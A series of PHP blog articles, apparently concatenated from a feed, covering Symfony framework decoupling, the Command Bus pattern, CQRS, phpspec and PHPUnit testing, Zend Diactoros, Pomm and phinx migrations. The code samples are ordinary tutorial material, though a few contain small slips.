'Content-Type' => 'application/json'
))->willReturn($request);
$requestHandler->handle($request)->willReturn($response);
$response->getBody()->willReturn($stream);
$stream->__toString()->willReturn(json_encode($quote));
$this->submit(self::QUOTE)->shouldBe($quote);
}
}
The choice between the first solution and the second one really depends on our preferences and on what we're trying to achieve. For the sake of this article, we'll stick to the first one (to avoid having to create the factory class and change the functional test, this article is already long enough!).
Let's run our tests to bootstrap the code:
vendor/bin/phpspec run
Now we can write the actual code:
<?php
// src/Acme/FortuneSdk/Quote/SubmitNewQuote/RemoteSubmitNewQuote.php
namespace Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Remote\RequestHandler;
use Zend\Diactoros\Request;
use Zend\Diactoros\Stream;
class RemoteSubmitNewQuote implements SubmitNewQuote
{
private $requestHandler;
private $url;
public function __construct(RequestHandler $requestHandler, $url)
{
$this->requestHandler = $requestHandler;
$this->url = $url;
}
public function submit($quote)
{
$body = new Stream('php://memory', 'w');
$body->write(json_encode(array(
'quote' => $quote,
)));
$request = new Request($this->url.'/v1/quotes', 'POST', $body, array(
'Content-Type' => 'application/json'
));
$quote = json_decode($this->requestHandler->handle($request)->getBody()->__toString(), true);
return $quote;
}
}
This should be sufficient to make our tests pass:
sh ./bin/test.sh
All green!
We now have a SDK that provides a SubmitNewQuote service allowing us to submit new quotes.
Since we've mocked the network connection, we can't be sure that our SDK actually works.
Manual testing can be sufficient in this case: we can build a Command Line Interface (CLI)
client and check by ourselves if everything is fine, once in a while.
Inversion of Control is a principle that can come handy when dealing with third party library, especially the ones that change often like Guzzle. It can be applied easily: instead of making our high level classes rely on concrete low level ones, we just need to introduce an interface.
Once again, all projects are different and this solution might not apply in every case. If we're building an application that we expect to maintain for a couple of years it can be worth it to protect ourselves from external changes.
]]>Reference: see the phpspec reference article
As always, different responsibilities mean also different reasons to change: frameworks have a history of Backward Compatibility (BC) breaks and they do so regardless of your project.
Take for example Symfony: it only started to follow Semantic Versioning
from version 2.3. The upgrade to version 3 has been made easier by allowing developers
to know what was deprecated, but the removal of those features still means a lot of
work in your application.
The arrival of the new standard PSR-7 brings
a lot of questions on the future of Symfony: for now it allows to choose
between symfony/http-foundation and psr/http-message, but if Symfony doesn't
want to fall back behind (Zend 3 is fully based on PSR-7)
it might have to introduce another big BC break (event listeners with the Request
and Response are not possible the way they are now with PSR-7).
Migrating Symfony applications (from symfony1, from symfony 2.0, etc) is so hard that it is a business on its own.
Does that mean that we shouldn't use any frameworks? Should we just don't care and embrace fully frameworks?
This article will explain how to avoid both extremes, by decoupling from the framework. It can be done by restricting the framework to its infrastructure responsibilities (HTTP, CLI), by only using its entry points (Controller, Command) and by using the Command Bus pattern.
We're going to build part of a fortune application for our example, more precisely we're going to build an endpoint allowing us to submit quotes.
To do so, we'll bootstrap a symfony application using the Empty Edition:
composer create-project gnugat/symfony-empty-edition fortune
cd fortune
We'll need to install our test frameworks:
composer require --dev phpunit/phpunit
composer require --dev phpspec/phpspec
Then add them to our test script:
#!/usr/bin/env sh
# bin/test.sh
echo ''
echo '// Building test environment'
rm -rf app/cache/test app/logs/*test.log
composer --quiet --no-interaction install --optimize-autoloader > /dev/null
php app/console --env=test --quiet cache:clear
echo ''
echo ' [OK] Test environment built'
echo ''
vendor/bin/phpspec --format=dot && vendor/bin/phpunit
Finally we'll configure PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
<!-- phpunit.xml.dist -->
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit backupGlobals="false" colors="true" syntaxCheck="false" bootstrap="app/bootstrap.php">
<testsuites>
<testsuite name="System Tests">
<directory>tests</directory>
</testsuite>
</testsuites>
</phpunit>
Our endpoint will receive JSON encoded content. PHP does not populate $_POST with
this data, causing an empty $request->request. We can create an event listener
to fix this issue:
<?php
// src/AppBundle/EventListener/JsonRequestListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class JsonRequestListener
{
public function onKernelRequest(GetResponseEvent $event)
{
$request = $event->getRequest();
$hasBeenSubmited = in_array($request->getMethod(), array('PATCH', 'POST', 'PUT'), true);
$isJson = (1 === preg_match('#application/json#', $request->headers->get('Content-Type')));
if (!$hasBeenSubmited || !$isJson) {
return;
}
$data = json_decode($request->getContent(), true);
if (JSON_ERROR_NONE !== json_last_error()) {
$event->setResponse(new Response('{"error":"Invalid or malformed JSON"}', 400, array('Content-Type' => 'application/json')));
}
$request->request->add($data ?: array());
}
}
This logic is infrastructure related, so it makes sense to keep it in AppBundle.
To enable it, configure it in the Dependency Injection Container:
# app/config/services/event_listener.yml
services:
app.json_request_listener:
class: AppBundle\EventListener\JsonRequestListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
We also need to make sure files in app/config/services are imported:
<?php
// app/config/importer.php
use Symfony\Component\Finder\Finder;
$finder = new Finder();
$files = $finder->files()->name('*.yml')->in(__DIR__.'/services');
foreach ($files as $file) {
$loader->import($file->getRealpath());
}
Our first step will be to describe how the endpoint should work, with a test:
<?php
// tests/AppBundle/Controller/QuoteControllerTest.php
namespace tests\AppBundle\Controller;
use AppKernel;
use PHPUnit_Framework_TestCase;
use Symfony\Component\HttpFoundation\Request;
class QuoteControllerTest extends PHPUnit_Framework_TestCase
{
private $app;
protected function setUp()
{
$this->app = new AppKernel('test', false);
$this->app->boot();
}
/**
* @test
*/
public function it_submits_a_new_quote()
{
$headers = array('CONTENT_TYPE' => 'application/json');
$request = Request::create('/v1/quotes', 'POST', array(), array(), array(), $headers, json_encode(array(
'quote' => 'Nobody expects the spanish inquisition',
)));
$response = $this->app->handle($request);
self::assertSame(201, $response->getStatusCode(), $response->getContent());
}
}
Note: Testing only the status code is called "Smoke Testing" and is a very efficient way to check if the application is broken. Testing the content would be tedious and would make our test fragile as it might change often.
Let's run it:
./bin/test.sh
The tests fail because the controller doesn't exist. Let's fix that:
<?php
// src/AppBundle/Controller/QuoteController.php
namespace AppBundle\Controller;
use Acme\Fortune\Quote\SubmitNewQuote;
use Acme\Fortune\Quote\SubmitNewQuoteHandler;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class QuoteController
{
private $submitNewQuoteHandler;
public function __construct(SubmitNewQuoteHandler $submitNewQuoteHandler)
{
$this->submitNewQuoteHandler = $submitNewQuoteHandler;
}
public function submitNewAction(Request $request)
{
$sumbitNewQuote = new SubmitNewQuote(
$request->request->get('quote')
);
$newQuote = $this->submitNewQuoteHandler->handle($sumbitNewQuote);
return new Response(json_encode($newQuote), 201, array('Content-Type' => 'application/json'));
}
}
Now we need to configure the controller as a service:
# app/config/services/controller.yml
services:
app.quote_controller:
class: AppBundle\Controller\QuoteController
arguments:
- "@app.submit_new_quote_handler"
Then we need to configure the route:
# app/config/routings/quote.yml
submit_new_quote:
path: /v1/quotes
defaults:
_controller: app.quote_controller:submitNew
methods:
- POST
This file needs to be imported:
# app/config/routing.yml
quote:
resource: routings/quote.yml
Finally we can run the test again:
./bin/test.sh
It now fails for a different reason: SubmitNewQuote and its handler class don't exist.
SubmitNewQuote is a Data Transfer Object (DTO): its responsibility is to wrap
input parameters in a well named class (in this case a class that describes the action intended).
It's also the best place to do some basic validation on the input parameters.
Note: In the Command Bus pattern,
SubmitNewQuotewould be a Command (different from the CLI Command).
We'll write a test for this, but first we'll bootstrap the test class:
vendor/bin/phpspec describe 'Acme\Fortune\Quote\SubmitNewQuote'
Now we can decribe the different validation rules:
<?php
// spec/Acme/Fortune/Quote/SubmitNewQuoteSpec.php
namespace spec\Acme\Fortune\Quote;
use PhpSpec\ObjectBehavior;
class SubmitNewQuoteSpec extends ObjectBehavior
{
const QUOTE = 'Nobody expects the spanish inquisition';
function it_fails_if_required_quote_parameter_is_missing()
{
$this->beConstructedWith(null);
$this->shouldThrow('Acme\Fortune\Exception\ValidationFailedException')->duringInstantiation();
}
function it_fails_if_quote_parameter_is_empty()
{
$this->beConstructedWith('');
$this->shouldThrow('Acme\Fortune\Exception\ValidationFailedException')->duringInstantiation();
}
}
Note: Since this class has nothing to do with Symfony, we don't put it in
AppBundle. By keeping it in its own namespace, we protect it from framework directory tree changes, for example beforeAppBundlethe norm wasAcme\FortuneBundle. We also allow ourselves to move it to another framework (e.g. Laravel, Zend, etc).
Let's run the tests:
./bin/test.sh
It fails because the exception doesn't exist yet:
<?php
// src/Acme/Fortune/Exception/ValidationFailedException.php
namespace Acme\Fortune\Exception;
class ValidationFailedException extends FortuneException
{
}
We're making it a sub type of FortuneException: that way we can catch all exceptions
related to our code (all other exceptions can be considered as Internal Server Errors).
<?php
// src/Acme/Fortune/Exception/FortuneException.php
namespace Acme\Fortune\Exception;
use DomainException;
class FortuneException extends DomainException
{
}
Now we need to create the Command:
<?php
// src/Acme/Fortune/Quote/SubmitNewQuote.php
namespace Acme\Fortune\Quote;
use Acme\Fortune\Exception\ValidationFailedException;
class SubmitNewQuote
{
public function __construct($quote)
{
if (null === $quote) {
throw new ValidationFailedException('Missing required "quote" parameter');
}
if ('' === $quote) {
throw new ValidationFailedException('Invalid "quote" parameter: must not be empty');
}
$this->quote = (string) $quote;
}
}
Running the tests again:
./bin/test.sh
Everything seems fine.
Instead of catching exceptions in our controllers we can create an event listener:
<?php
// src/AppBundle/EventListener/FortuneExceptionListener.php
namespace AppBundle\EventListener;
use Symfony\Component\HttpKernel\Event\GetResponseForExceptionEvent;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Event\GetResponseEvent;
class FortuneExceptionListener
{
public function onKernelException(GetResponseForExceptionEvent $event)
{
$exception = $event->getException();
if (!$exception instanceof FortuneException) {
return;
}
$content = json_encode(array('error' => $exception->getMessage()));
$statusCode = Response::HTTP_UNPROCESSABLE_ENTITY;
$event->setResponse(new Response($content, $statusCode, array('Content-Type' => 'application/json')));
}
}
This lowers the risk of forgetting to catch an exception and it also keeps our controller slim.
Let's enable it in the DIC:
# app/config/services/event_listener.yml
services:
app.fortune_exception_listener:
class: AppBundle\EventListener\FortuneExceptionListener
tags:
- { name: kernel.event_listener, event: kernel.exception, method: onKernelException }
app.json_request_listener:
class: AppBundle\EventListener\JsonRequestListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest }
SubmitNewQuoteHandler's responsibility is to validate SubmitNewQuote data against
business rules (e.g. no quote duplicates, author must exist, etc) and to call the
appropriate services to process it.
Reading its code feels like reading the details of a use case:
To handle the submission of a new quote, we need to generate a unique identifier and then we need to save the new quote.
Let's bootstrap its test:
vendor/bin/phpspec describe 'Acme\Fortune\Quote\SubmitNewQuoteHandler'
Then edit the test:
<?php
// spec/Acme/Fortune/Quote/SubmitNewQuoteHandlerSpec.php
namespace spec\Acme\Fortune\Quote;
use Acme\Fortune\Quote\SubmitNewQuote;
use Acme\Fortune\Quote\Service\SaveNewQuote;
use Acme\Fortune\Quote\Service\UniqueIdentifierGenerator;
use PhpSpec\ObjectBehavior;
class SubmitNewQuoteHandlerSpec extends ObjectBehavior
{
const ID = '921410e8-eb98-4f99-ba98-055d46980511';
const QUOTE = 'Nobody expects the spanish inquisition!';
function let(SaveNewQuote $saveNewQuote, UniqueIdentifierGenerator $uniqueIdentifierGenerator)
{
$this->beConstructedWith($saveNewQuote, $uniqueIdentifierGenerator);
}
function it_saves_new_quote(SaveNewQuote $saveNewQuote, UniqueIdentifierGenerator $uniqueIdentifierGenerator)
{
$submitNewQuote = new SubmitNewQuote(self::QUOTE);
$quote = array(
'id' => self::ID,
'quote' => self::QUOTE,
);
$uniqueIdentifierGenerator->generate()->willReturn(self::ID);
$saveNewQuote->save($quote)->shouldBeCalled();
$this->handle($submitNewQuote)->shouldBe($quote);
}
}
Let's run the tests:
./bin/test.sh
After generating interfaces for SaveNewQuote and UniqueIdentifierGenerator
and after bootstrapping the code for SubmitNewQuoteHandler, the test will fail
because we need to complete it:
<?php
// src/Acme/Fortune/Quote/SubmitNewQuoteHandler.php
namespace Acme\Fortune\Quote;
use Acme\Fortune\Quote\Service\SaveNewQuote;
use Acme\Fortune\Quote\Service\UniqueIdentifierGenerator;
class SubmitNewQuoteHandler
{
private $saveNewQuote;
private $uniqueIdentifierGenerator;
public function __construct(SaveNewQuote $saveNewQuote, UniqueIdentifierGenerator $uniqueIdentifierGenerator)
{
$this->saveNewQuote = $saveNewQuote;
$this->uniqueIdentifierGenerator = $uniqueIdentifierGenerator;
}
public function handle(SubmitNewQuote $sumbitNewQuote)
{
$quote = array(
'id' => $this->uniqueIdentifierGenerator->generate(),
'quote' => $sumbitNewQuote->quote,
);
$this->saveNewQuote->save($quote);
return $quote;
}
}
Now we can configure the service:
# app/config/services/quote.yml
services:
app.submit_new_quote_handler:
class: Acme\Fortune\Quote\SubmitNewQuoteHandler
arguments:
- "@app.save_new_quote"
- "@app.unique_identifier_generator"
Finally can run the tests one last time:
./bin/test.sh
Allmost green!
They fail because app.save_new_quote and app.unique_identifier_generator don't
exist yet. They will be the topic of another article ;) .
By restricting frameworks to their entry points (Controllers, Commands, etc) and using the Command Bus to define our project entry points (domain boundaries) we are able to decouple from the framework, allowing us to restrict the impact of BC breaks.
Of course, all projects are different and this solution might not be possible everywhere. RAD development is a robust solution for web agencies, especially if they are chosen to bootstrap a project as fast as possible and then need to pass the project over to their customer after a short period.
On the other hand some companies are creating projects they will have to maintain for decades and those are also in need of delivering a first version early. Decoupling from the framework isn't something that slows down development, and there are ways to still release early (e.g. define Minimum Valuable Product and deliver small features iterations by iterations).
Note: There are a couple of bundles that provides Symfony with a Command Bus, among them:
If you're interrested on the subject, here's some resources:
]]>Reference: see the phpspec reference article
phpspec was at first a port of rspec, it can be considered as a unit test framework that enforces practices it considers best.
Note: read more about phpspec.
In this article, we'll see how to use both tools together in a same project.
We're going to build part of a fortune application for our example, more precisely we're going to build a CLI allowing us to save quotes.
To do so, we'll bootstrap a symfony application using the Empty Edition:
composer create-project gnugat/symfony-empty-edition fortune
cd fortune
We'll need to install our test frameworks:
composer require --dev phpunit/phpunit
composer require --dev phpspec/phpspec
Finally we'll configure PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
<!-- phpunit.xml.dist -->
<!-- http://phpunit.de/manual/current/en/appendixes.configuration.html -->
<phpunit backupGlobals="false" colors="true" syntaxCheck="false" bootstrap="app/bootstrap.php">
<testsuites>
<testsuite name="System Tests">
<directory>tests</directory>
</testsuite>
</testsuites>
</phpunit>
Our first step will be to write a system test describing the command:
<?php
// tests/Command/SaveQuoteCommandTest.php
namespace AppBundle\Tests\Command;
use AppKernel;
use PHPUnit_Framework_TestCase;
use Symfony\Bundle\FrameworkBundle\Console\Application;
use Symfony\Component\Console\Tester\ApplicationTester;
class SaveQuoteCommandTest extends PHPUnit_Framework_TestCase
{
const EXIT_SUCCESS = 0;
private $app;
protected function setUp()
{
$kernel = new AppKernel('test', false);
$application = new Application($kernel);
$application->setAutoExit(false);
$this->app = new ApplicationTester($application);
}
/**
* @test
*/
public function it_saves_a_new_quote()
{
$exitCode = $this->app->run(array(
'quote:save',
'quote' => 'Nobody expects the spanish inquisition',
));
self::assertSame(self::EXIT_SUCCESS, $exitCode, $this->app->getDisplay());
}
}
Note: Testing only the exit code is called "Smoke Testing" and is a very efficient way to check if the application is broken. Testing the output would be tedious and would make our test fragile as it might change often.
Let's run it:
vendor/bin/phpunit
The tests fails because the command doesn't exist. Let's fix that:
<?php
// src/AppBundle/Command/SaveQuoteCommand.php
namespace AppBundle\Command;
use Symfony\Bundle\FrameworkBundle\Command\ContainerAwareCommand;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Output\OutputInterface;
class SaveQuoteCommand extends ContainerAwareCommand
{
protected function configure()
{
$this->setName('quote:save');
$this->addArgument('quote', InputArgument::REQUIRED);
}
protected function execute(InputInterface $input, OutputInterface $output)
{
$output->writeln('');
$output->writeln('// Saving quote');
$this->getContainer()->get('app.save_new_quote')->save(
$input->getArgument('quote')
);
$output->writeln('');
$output->writeln(' [OK] Quote saved');
$output->writeln('');
}
}
Then run the test again:
vendor/bin/phpunit
It now fails for a different reason: the service used doesn't exist.
The second step is to write the unit test for the service. With phpspec we can first bootstrap it:
vendor/bin/phpspec describe 'AppBundle\Service\SaveNewQuote'
Then we need to edit it:
<?php
// spec/AppBundle/Service/SaveNewQuoteSpec.php
namespace spec\AppBundle\Service;
use PhpSpec\ObjectBehavior;
use Symfony\Component\Filesystem\Filesystem;
class SaveNewQuoteSpec extends ObjectBehavior
{
const FILENAME = '/tmp/quotes.txt';
const QUOTE = 'Nobody expects the spanish inquisition!';
function let(Filesystem $filesystem)
{
$this->beConstructedWith($filesystem, self::FILENAME);
}
function it_saves_new_quote(Filesystem $filesystem)
{
$filesystem->dumpFile(self::FILENAME, self::QUOTE)->shouldBeCalled();
$this->save(self::QUOTE);
}
}
Time to run the suite:
vendor/bin/phpspec run
phpspec will detect that the tested class doesn't exist and will bootstrap it for us, so we just have to edit it:
<?php
// src/AppBundle/Service/SaveNewQuote.php
namespace AppBundle\Service;
use Symfony\Component\Filesystem\Filesystem;
class SaveNewQuote
{
private $filesystem;
private $filename;
public function __construct(Filesystem $filesystem, $filename)
{
$this->filesystem = $filesystem;
$this->filename = $filename;
}
public function save($quote)
{
$this->filesystem->dumpFile($this->filename, $quote);
}
}
Again, we're going to run our unit test:
vendor/bin/phpspec run
It's finally green! Our final step will be to define our service in the Dependency Injection Container:
# app/config/config.yml
imports:
- { resource: parameters.yml }
- { resource: importer.php }
framework:
secret: "%secret%"
services:
app.save_new_quote:
class: AppBundle\Service\SaveNewQuote
arguments:
- "@filesystem"
- "%kernel.root_dir%/cache/quotes"
To make sure everything is fine, let's clear the cache and run the test:
rm -rf app/cache/*
vendor/bin/phpunit
It's Super Green!
As we can see, PHPUnit and phpspec can work perfectly well together.
Of course we could write our unit test in a similar manner with PHPUnit:
<?php
// tests/Service/SaveNewQuoteTest.php
namespace AppBundle\Tests\Service;
use AppBundle\Service\SaveNewQuote;
use PHPUnit_Framework_TestCase;
class SaveNewQuoteTest extends PHPUnit_Framework_TestCase
{
const FILENAME = '/tmp/quotes.txt';
const QUOTE = 'Nobody expects the spanish inquisition!';
private $filesystem;
private $saveNewQuote;
protected function setUp()
{
$this->filesystem = $this->prophesize('Symfony\Component\Filesystem\Filesystem');
$this->saveNewQuote = new SaveNewQuote($this->filesystem->reveal(), self::FILENAME);
}
/**
* @test
* @group unit
*/
public function it_saves_new_quote()
{
$this->filesystem->dumpFile(self::FILENAME, self::QUOTE)->shouldBeCalled();
$this->saveNewQuote->save(self::QUOTE);
}
}
And run it separately:
vendor/bin/phpunit --group=unit
But then we would lose all the advantages of phpspec:
]]>Reference: see the phpspec reference article
Note: Command Bus is often used to comply to [CQRS](/2015/08/25/cqrs.html, but not only.
Here's how to install Tactician:
composer require league/tactician:^0.6
Then we have to associate a Command to a CommandHandler:
<?php
use League\Tactician\Setup\QuickStart;
require __DIR__.'/vendor/autoload.php';
$commandBus = QuickStart::create(array(
'Vendor\Project\Member\RegisterMember' => new Vendor\Project\Member\RegisterMemberHandler(),
));
It provides many framework integrations, including one for Symfony:
composer require league/tactician-bundle:^0.3
# Don't forget to register `League\Tactician\Bundle\TacticianBundle` in `AppKernel`
Then we just have to use the tactician.commandBus service. To register Command Handler, we
need to tag service definitions as follow:
services:
register_member_handler:
class: Vendor\Project\Member\RegisterMemberHandler
tags:
- { name: tactician.handler, command: Vendor\Project\Member\RegisterMember }
Now that the configuration is settled, here's a usage example:
$username = isset($argv[1]) ? $argv[1] : null;
$commandBus->handle(new RegisterMember($username));
The command would look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMember
{
private $username;
public function __construct($username)
{
if (null === $username) {
throw new \InvalidArgumentException('Missing required "username" parameter');
}
$this->username = $username;
}
public function getUsername()
{
return $this->username;
}
}
Note: Commands validate simple input logic (required parameters, parameter type, etc).
The Command Handler could look like this:
<?php
namespace Vendor\Project\Member;
class RegisterMemberHandler
{
private $memberRepository;
public function __construct(MemberRespository $memberRepository)
{
$this->memberRepository = $memberRepository;
}
public function handle(RegisterMember $registerMember)
{
$username = $registerMember->getUsername();
if ($memberRepository->has($username)) {
throw new \DomainException(sprintf('Given username "%s" already exists, and duplicates are not allowed', $username));
}
$memberRepository->register($registerMember);
}
}
The Command Handler validates more complex logic (member username duplication, etc).
Here's a nice reference about command validation: Form, Command, and Model Validation.
Here are some personal tips!
CommandBus is able to return the value of the executed CommandHandler. While this isn't advised in asynchronous applications (think messaging queues, like RabbitMQ) it can be useful in simple applications.
Because Commands also contain simple input validation you can write unit test for them, but since they're mainly DTOs it might not be too important.
CommandHandlers on the other way are good candidates for unit tests.
Remember when people said that controllers shouldn't have any logic in it? With the Command Bus pattern this becomes possible. It also makes this kind of logic reusable and testable.
Tactician is a nice library for this: it doesn't get in our way and allows you to choose between the "good" way or the "pragmatic" way (if you don't choose wisely, then shame on you).
]]>TL;DR: CQRS is about not mixing "read" and "write" logic. You can use patterns like a Repostiory / Search Engine and Command Bus to help you achieve this.
The Single Responsibility Principle (SRP) has many applications: we can find it in the Unix philosophy ("do one thing and do it well") and usually refactoring is all about identifying responsibilities and extracting them in their own classes.
Command/Query Responsibility Segregation (CQRS) can be viewed as a part of it.
In this article, we'll explore the pros and cons of CQRS and we'll see some ways to implement it.
We usually communicate with our application by giving it an input which can be viewed as a "message". Messages can be classified in 3 different types:
Note: For more information, have a look at Messaging Flavours by Mathias Verraes.
The CQRS principle states that Imperative messages should not be mixed with Interrogatory ones.
Note: Here's an interresting article about validating those messages.
Let's take the A/B testing example: we'd like to know which setting will attract more visits on a given page. To do so when a user visits the page, we send a request to an API with some helpful information.
On receiving the request, the API can simply push a message to a Messaging Queue (e.g. RabbitMQ). This request was an Informative message.
Note: To learn more about RabbitMQ, have a look at this article and those slides.
Eventually, the Messaging Queue will call a consumer and give it the message: now the consumer must register the information somewhere. This message is an Imperative one.
Later on, we can display the statistic on a dashboard. This time, we're dealing with an interrogatory message.
As we can see, the CQRS principle is applied here. It is really useful whith asynchronous use cases.
Another example would be member registration: a new member submits a registration form. If it is valid, they're told to check their email: a confirmation token has been sent to them.
Behind the scene, our application receives the request: it is an Imperative message so we create a token and save the information somewhere. Once done the application can send a "Member registered" event, which will trigger a listener that will send the email.
Note: the registration logic can be decoupled from the email logic: we can first have a service that registers members and when done sends a "Member registered" event. Then a listener could call our email service.
Once again, we've applied the CQRS principle, but in a synchronous use case. If later on our application gets successful, we'll might want to make those process asynchronous and it will be easy to do so.
Our final example will be about an API that allows scientists to report a new species. They need to send a POST Request to the endpoint, which in turn will return a response containing the created resource.
The issue here is that we're going to mix an Imperative message (report a new species) and an Interrogatory message (get the newly reported species).
CQRS cannot be applied "fully" everywhere, but we can try the following compromises:
Note: for the second solution, we need to create our own UUID, instead of relying on the database to generate the IDs.
The Command Bus pattern is really helpful to handle Imperative Messages. It's composed of 3 objects:
The Command would be constructed in an entry point (Controller, Command, EventListener), with parameters extracted from the input (Request, Input, Event) and then given to the CommandBus.
The CommandBus is usually a Middleware:
Note: To learn more about this pattern, have a look at the following articles:
There's actually many options to handle Interrogatory messages.
The Repository design pattern introduces a class that acts like a collection, but behind the scene relies on a Gateway to actually retrieve data (could be from a file, a database, a remote endpoint etc) and on a Factory to format the returned value.
Usually "find" methods are added to the repository with a name describing the expected criterias.
Note: Here's a list of nice articles about this parttern:
Sometimes the repositories will grow bigger and bigger. The alternative solution would be to build a Criteria object and pass it to a service.
Here's some of these solutions:
Personally I've been experimenting with a Proof Of Concept (POC): SearchEngine. I still need more experimentations to start advising on this subject, so if you want to share your experience you'd be welome to post a comment :) .
CQRS helps you to decouple your code (from itself and from third party libraries) even if, like every principles, it cannot be applied everywhere.
To help you apply it, you can use Command Bus and Repositories / SearchEngine.
]]>Note: Here's a list of interresting articles about CQRS:
It can be installed using Composer:
composer require zendframework/zend-diactoros:^1.0
We'd like to retrieve data from remote endpoints, using our internal RequestHandler:
<?php
namespace Vendor\Project;
use Psr\Http\Message\RequestInterface;
interface RequestHandler
{
// @return \Psr\Http\Message\ResponseInterface
public function handle(RequestInterface $request);
}
Note: For the sake of our example we use this interface, but in your application you'd use an actual HTTP client (e.g. Guzzle).
RequestHandler expects a Request parameter, so we're going to build it:
<?php
namespace Vendor\Project;
use Zend\Diactoros\Request;
use Zend\Diactoros\Stream;
class MemberGateway
{
private $requestHandler;
private $username;
private $password;
public function __construct(RequestHandler $requestHandler, $username, $password)
{
$this->requestHandler = $requestHandler;
$this->username = $username;
$this->password = $password;
}
public function findOne($id)
{
$request = new Request('http://example.com/members/'.$id, 'GET', 'php://memory', array(
'Authorization' => 'Basic '.base64_encode($this->username.':'.$this->password),
));
$item = json_decode($this->requestHandler->handle($request)->getBody()->__toString(), true);
return array(
'id' => $item['id'],
'name' => $item['name'],
'description' => $item['description'],
);
}
public function createOne($name, $description)
{
$body = new Stream('php://memory', 'w');
$body->write(json_encode(array(
'name' => $name,
'description' => $description,
)));
$request = new Request('http://example.com/members/'.$id, 'GET', $body, array(
'Authorization' => 'Basic '.base64_encode($this->username.':'.$this->password),
));
$item = json_decode($this->requestHandler->handle($request)->getBody()->__toString(), true);
return array(
'id' => $item['id'],
'name' => $item['name'],
'description' => $item['description'],
);
}
}
The body of Request and Response is wrapped in a Stream (as specified in PSR-7).
If the Request body should be empty, simply pass php://memory.
If the Response has a body, we can convert the Stream into a string using __toString.
Zend Diactoros is becoming the de facto PSR-7 implementation, for example it's used in Symfony.
You should give it a try!
]]>In this article we'll quickly have a look at Pomm Foundation.
Pomm can be installed using Composer:
composer require pomm-project/foundation:^2.0@rc
Then we need to create a QueryManager:
<?php
require __DIR__.'/vendor/autoload.php';
$pomm = new PommProject\Foundation\Pomm(
'database_name' => array(
'dsn' => 'pgsql://database_user:database_pass@database_host:database_port/database_name',
'class:session_builder' => '\PommProject\Foundation\SessionBuilder',
),
);
/**
* @var PommProject\Foundation\QueryManager\QueryManagerInterface
*/
$queryManager = $pomm->getDefaultSession()->getQueryManager();
The QueryManager allows us to send query to our database:
$items = $queryManager->query('SELECT * FROM item WHERE name = $1 AND description = $2', array(
'Arthur Dent',
'Nobody expects the Spanish Inquisition!',
));
The returned value is an iterator, each element is a row (an associative array):
foreach ($items as $item) {
echo $item['description'];
}
If you'd rather get all elements as an array, you can use iterator_to_array:
$arrayItems = iterator_to_array($items);
Note: Behind the scene the result is stored in a
resource, which is usually more efficient than a PHP array. The iterator allows to get the rows from theresourceone by one, which can save memory.
Pomm Foundation provides an efficient abstraction over pg_* functions.
In comparison Doctrine DBAL uses PDO and tries to abstract vendor features,
so if you're using PostgresSQL and don't need an ORM, you can give it a try!
First of all, we need to install it using Composer:
composer require robmorgan/phinx:^0.4
With this we get a phar that can be run:
phinx
Tip: make your vendor's binaries available by adding
vendor/binto your$PATH.export PATH="vendor/bin:$PATH".
Then we need to configure the settings:
<?php
// File: phinx.php
$parameters = \Symfony\Component\Yaml\Yaml::parse(file_get_contents(__DIR__.'/app/config/parameters.yml'));
return array(
'paths' => array(
'migrations' => __DIR__.'/migrations'
),
'environments' => array(
'default_migration_table' => 'migration',
'default_database' => 'prod',
'prod' => array(
'adapter' => 'pgsql', // Could also be "mysql", "sqlite" or "sqlsrv"
'host' => $parameters['parameters']['database_host'],
'name' => $parameters['parameters']['database_name'],
'user' => $parameters['parameters']['database_user'],
'pass' => $parameters['parameters']['database_pass'],
'port' => $parameters['parameters']['database_port'],
'charset' => 'utf8',
),
'test' => array(
'adapter' => 'pgsql',
'host' => $parameters['parameters']['database_host'],
'name' => $parameters['parameters']['database_name'].'_test',
'user' => $parameters['parameters']['database_user'],
'pass' => $parameters['parameters']['database_pass'],
'port' => $parameters['parameters']['database_port'],
'charset' => 'utf8',
),
),
);
The configuration could also be written in YAML, here I used PHP to be able to share the database configuration with the application's one.
Migration files can be bootstrapped using the command:
phinx create FirstVersion
Which results in the following file (migrations/20150805201245_first_version.php):
<?php
use Phinx\Migration\AbstractMigration;
class FirstVersion extends AbstractMigration
{
public function change()
{
}
}
In the change method we need to get a Table object using $this->table('table_name')
and then use it to describe the changes in the schema: phinx is then able to figure out
how to reverse them if necessary.
If you'd rather write SQL queries directly you need to remove change and define
a up and a down method. In them you can use $this->query('SQL') to execute
your queries.
Example:
<?php
use Phinx\Migration\AbstractMigration;
class FirstVersion extends AbstractMigration
{
public function up()
{
$this->query('CREATE TABLE my_table;');
}
public function down()
{
$this->query('DROP TABLE my_table;');
}
}
Migrating an application then becomes as simple as:
phinx migrate
And rolling back:
phinx rollback
Time for the personal tips!
Using Doctrine Migrations is fine when using Doctrine ORM, but for the rest (including Doctrine DBAL) I'd rather use phinx.
While Table allows to write portable migrations and saves you the time of writing the down method,
I'd advise you to write directly SQL queries: it's a layer less to learn and it will be consistent
with the migrations where you insert / update data.
Migration libraries are all very similar, the nice touch of phinx is that it's not coupled to any framework and it doesn't require any integration.
Give it a try!
]]>The CQRS principle specifies that an application entry point (e.g. console command, or web controller) should only do an imperative command (e.g. register a member) or an interrogatory command (how many members?).
Here's a nice reference about the different kinds of commands, by Mathias Verraes: Messaging flavours.
This allows to simplify the application and the code base: those are two different concerns and with the Single Responsibility Principle we've learned that they shouldn't be mixed.
The Command Bus pattern aims at solving the imperative command part.
With this design pattern, we have 3 different kinds of class:
RegisterMember)Our entry points would create the command using the parameters received (e.g. console input or request content), and then give it to the Command Bus.
Having a Command Bus class is really nice as it allows us to execute things before and after every commands: for example in a test environment we could wrap SQL queries in transactions and roll them back.
Here's how to install Simple Bus:
composer require simple-bus/message-bus:^3.0
